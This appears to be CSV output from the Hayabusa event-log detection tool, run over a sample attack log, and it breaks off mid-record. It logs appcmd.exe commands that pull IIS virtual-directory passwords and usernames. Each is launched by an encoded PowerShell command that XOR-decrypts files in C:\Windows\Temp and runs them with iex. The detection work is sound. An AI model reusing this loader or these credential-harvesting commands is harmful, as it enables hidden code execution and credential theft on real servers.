JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.784 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.894 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.964 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:20.034 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:20.124 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0